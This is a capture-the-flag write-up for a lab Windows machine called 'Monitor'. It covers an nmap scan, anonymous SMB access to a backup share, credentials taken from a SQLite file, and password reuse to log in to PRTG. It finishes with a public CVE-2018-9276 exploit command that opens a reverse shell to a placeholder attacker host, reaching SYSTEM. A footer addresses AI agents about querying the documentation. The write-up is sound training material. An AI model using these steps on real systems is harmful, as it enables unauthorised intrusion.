# Monitor

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-3e1dade897fc86489f3596dedb99e6744fe92ced%2Fimage.png?alt=media)

## Nmap

```
kali@kali:~$ nmap 172.31.1.21 -p- -sV

PORT      STATE SERVICE       VERSION
80/tcp    open  http          Indy httpd 18.1.38.11958 (Paessler PRTG bandwidth monitor)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
```

## SMB

As per usual I start with a quick null authentication check using `smbclient`. We see we are able to list shares and then able to connect into the 'WebBackups' share. From here we only have one folder listen which is a zip file. We use the `get` command to download the file before moving on to inspecting its contents.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-f9db6891d1d8cdbaf1a2e1dd2c57be4d1571656f%2Fimage.png?alt=media)

After unzipping the zip file with the `unzip` command we see the contents listed below. An immediate interesting file is db.sqlite3 file which is a database file.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c2b420551eb8d05c7cb734fca73a12f2fa2a0dbe%2Fimage.png?alt=media)

Kali comes pre-installed with a application called 'DB Browser for SQlite' which we can use to open the db.sqlite3.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4d0d65698fe706d17b2c849f4dc42a7882ed36d9%2Fimage.png?alt=media)

Moving over to the 'Browse Data' tab we see we have some credentials for `django:Se7vmMqP0al`

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-3295ea86f1bf6f41b88fd824fad73c3dfea97856%2Fimage.png?alt=media)

For now we are finished with the database file.

## HTTP

When we head over to the root page of 172.31.1.21 we come to an install of PRTG network monitor.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-247f0c159dd8fdb5eb7b12c57a53e2b68845b274%2Fimage.png?alt=media)

I looked up the default credentials which are `prtgadmin:prtgadmin`. The default credentials did not provide myself access to the login. I also tried the credentials we pulled from the database earlier and they not did not either.

I did then try the password of 'Se7vmMqP0al' with the default PRTG username of 'prtgadmin' and was able to login.

![http://172.31.1.21/welcome.htm](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-8b444b045732fec82e8377c94b03fc7208dc4b73%2Fimage.png?alt=media)

## Exploitation

Researching exploits for PRTG network monitor on or below version 18.1.38.11958 as defined at the bottom of the root page we come to quite a few potential exploits. The easiest and most reliable I found was a PoC created by wildkindcc.

{% embed url="<https://github.com/wildkindcc/CVE-2018-9276>" %}

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-364e02f95437eadfc809bc490b9d980480368839%2Fimage.png?alt=media)

We can then run the exploit with the required parameters.

```
python2 exploit.py -i 172.31.1.21 -p 80 --lhost <IP> --lport 4455 --user prtgadmin --password Se7vmMqP0al
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-fd29703fd6c615f92dbd79024a75ab2557de0d02%2Fimage.png?alt=media)

We are now SYSTEM on the server.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://viperone.gitbook.io/pentest-everything/writeups/cyberseclabs/windows/monitor.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.